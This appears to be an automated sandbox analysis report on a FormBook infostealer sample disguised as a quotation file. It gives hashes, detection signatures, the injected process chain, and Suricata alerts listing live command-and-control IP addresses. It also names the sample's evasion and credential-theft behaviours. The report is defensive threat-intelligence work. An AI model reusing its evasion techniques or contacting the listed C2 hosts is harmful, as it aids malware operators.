
Windows Analysis Report
QUOTATION#050125.exe

Overview

General Information

Sample name: QUOTATION#050125.exe
Analysis ID: 1586807
MD5: b1261de24d9bcbf7395ae21722d32a37
SHA1: dd0d541b122ef10b820925b47ab94d76905df95c
SHA256: ba10f77f57b8d779c13abf725979c204d8f3b618ebd0d2f88e6c0cc7eb11c989

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • QUOTATION#050125.exe (PID: 8936 cmdline: "C:\Users\user\Desktop\QUOTATION#050125.exe" MD5: B1261DE24D9BCBF7395AE21722D32A37)
    • svchost.exe (PID: 9000 cmdline: "C:\Users\user\Desktop\QUOTATION#050125.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • SwDwSdNMaTt.exe (PID: 7780 cmdline: "C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 3252 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • SwDwSdNMaTt.exe (PID: 5384 cmdline: "C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3380 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
3.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#050125.exe, ParentProcessId: 8936, ParentProcessName: QUOTATION#050125.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ProcessId: 9000, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#050125.exe, ParentProcessId: 8936, ParentProcessName: QUOTATION#050125.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ProcessId: 9000, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T16:52:36.489820+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.30 | 49816 | 23.51.25.15 | 443 | TCP
2025-01-09T16:54:42.963333+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.30 | 49834 | 23.51.25.15 | 443 | TCP
2025-01-09T16:56:49.482152+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.30 | 49866 | 23.51.25.15 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T16:53:52.051834+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49822 | 194.9.94.85 | 80 | TCP
2025-01-09T16:54:15.757014+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49826 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:29.548389+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49830 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:43.248467+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49835 | 199.192.21.169 | 80 | TCP
2025-01-09T16:55:06.653934+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49840 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:22.176095+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49844 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:37.221311+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49848 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:50.646653+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49852 | 172.67.132.227 | 80 | TCP
2025-01-09T16:56:13.200101+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49856 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:28.134094+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49860 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:42.719717+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49864 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:56.585336+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49869 | 103.106.67.112 | 80 | TCP
2025-01-09T16:57:10.239085+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49873 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:25.324867+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49877 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:33.954130+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49878 | 194.9.94.85 | 80 | TCP
2025-01-09T16:57:47.321678+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49882 | 45.33.2.79 | 80 | TCP
2025-01-09T16:58:00.985202+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49886 | 104.21.32.1 | 80 | TCP
2025-01-09T16:58:14.525215+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49890 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:37.649832+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49894 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:50.987001+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49898 | 13.248.169.48 | 80 | TCP
2025-01-09T16:59:05.402450+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49902 | 160.25.166.123 | 80 | TCP
2025-01-09T16:59:18.658329+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.30 | 49906 | 172.67.132.227 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T16:54:07.714217+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49823 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:10.391004+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49824 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:13.077070+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49825 | 45.33.2.79 | 80 | TCP
2025-01-09T16:54:21.608591+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49827 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:24.244183+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49828 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:26.937990+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49829 | 104.21.32.1 | 80 | TCP
2025-01-09T16:54:35.120967+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49831 | 199.192.21.169 | 80 | TCP
2025-01-09T16:54:37.839285+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49832 | 199.192.21.169 | 80 | TCP
2025-01-09T16:54:40.554331+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49833 | 199.192.21.169 | 80 | TCP
2025-01-09T16:54:58.140683+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49837 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:00.987330+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49838 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:03.815419+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49839 | 47.83.1.90 | 80 | TCP
2025-01-09T16:55:13.143460+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49841 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:16.828657+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49842 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:19.503582+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49843 | 13.248.169.48 | 80 | TCP
2025-01-09T16:55:28.531368+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49845 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:31.447955+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49846 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:34.328891+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49847 | 160.25.166.123 | 80 | TCP
2025-01-09T16:55:42.696549+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49849 | 172.67.132.227 | 80 | TCP
2025-01-09T16:55:45.403920+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49850 | 172.67.132.227 | 80 | TCP
2025-01-09T16:55:47.995536+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49851 | 172.67.132.227 | 80 | TCP
2025-01-09T16:56:04.899063+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49853 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:07.661034+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49854 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:10.433956+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49855 | 136.243.64.147 | 80 | TCP
2025-01-09T16:56:19.465774+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49857 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:22.308847+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49858 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:25.148181+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49859 | 202.95.11.110 | 80 | TCP
2025-01-09T16:56:33.688551+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49861 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:36.359727+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49862 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:40.047154+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49863 | 13.248.169.48 | 80 | TCP
2025-01-09T16:56:48.438417+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49865 | 103.106.67.112 | 80 | TCP
2025-01-09T16:56:51.152255+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49867 | 103.106.67.112 | 80 | TCP
2025-01-09T16:56:53.881158+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49868 | 103.106.67.112 | 80 | TCP
2025-01-09T16:57:02.223002+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49870 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:04.782211+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49871 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:07.466673+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49872 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:16.761522+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49874 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:19.624236+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49875 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:22.481832+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49876 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:39.268222+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49879 | 45.33.2.79 | 80 | TCP
2025-01-09T16:57:41.954078+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49880 | 45.33.2.79 | 80 | TCP
2025-01-09T16:57:44.641972+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49881 | 45.33.2.79 | 80 | TCP
2025-01-09T16:57:53.012748+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49883 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:55.676284+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49884 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:58.348105+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49885 | 104.21.32.1 | 80 | TCP
2025-01-09T16:58:06.393139+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49887 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:09.106949+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49888 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:11.813837+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49889 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:29.109139+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49891 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:31.945382+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49892 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:34.815159+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49893 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:42.958756+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49895 | 13.248.169.48 | 80 | TCP
2025-01-09T16:58:45.628143+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49896 | 13.248.169.48 | 80 | TCP
2025-01-09T16:58:48.303957+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49897 | 13.248.169.48 | 80 | TCP
2025-01-09T16:58:56.719814+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49899 | 160.25.166.123 | 80 | TCP
2025-01-09T16:58:59.607669+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49900 | 160.25.166.123 | 80 | TCP
2025-01-09T16:59:02.498649+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49901 | 160.25.166.123 | 80 | TCP
2025-01-09T16:59:10.674523+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49903 | 172.67.132.227 | 80 | TCP
2025-01-09T16:59:13.329885+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49904 | 172.67.132.227 | 80 | TCP
2025-01-09T16:59:15.987992+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.11.30 | 49905 | 172.67.132.227 | 80 | TCP


AV Detection

Source: QUOTATION#050125.exe; Avira: detected
Source: QUOTATION#050125.exe; ReversingLabs: Detection: 63%
Source: Yara match; File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: QUOTATION#050125.exe; Joe Sandbox ML: detected
Source: QUOTATION#050125.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: cmdkey.pdbGCTL; source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP; source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmdkey.pdb; source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb; source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP; source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_000FC2A2 FindFirstFileExW, 2_2_000FC2A2
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_001368EE FindFirstFileW,FindClose, 2_2_001368EE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_0013698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_0013698F
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_0012D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0012D076
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_0012D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0012D3A9
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_00139642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00139642
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_0013979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_0013979D
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_00139B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_00139B2B
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_0012DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_0012DBBE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe; Code function: 2_2_00135C97 FindFirstFileW,FindNextFileW,FindClose, 2_2_00135C97
Source: C:\Windows\SysWOW64\cmdkey.exe; Code function: 4x nop then mov ebx, 00000004h; 6_2_030304E8

Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49832 -> 199.192.21.169:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49838 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49843 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49839 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49824 -> 45.33.2.79:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49835 -> 199.192.21.169:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49830 -> 104.21.32.1:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49822 -> 194.9.94.85:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49850 -> 172.67.132.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49847 -> 160.25.166.123:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49825 -> 45.33.2.79:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49844 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49823 -> 45.33.2.79:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49845 -> 160.25.166.123:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49863 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49856 -> 136.243.64.147:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49840 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49837 -> 47.83.1.90:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49854 -> 136.243.64.147:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49868 -> 103.106.67.112:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49846 -> 160.25.166.123:80
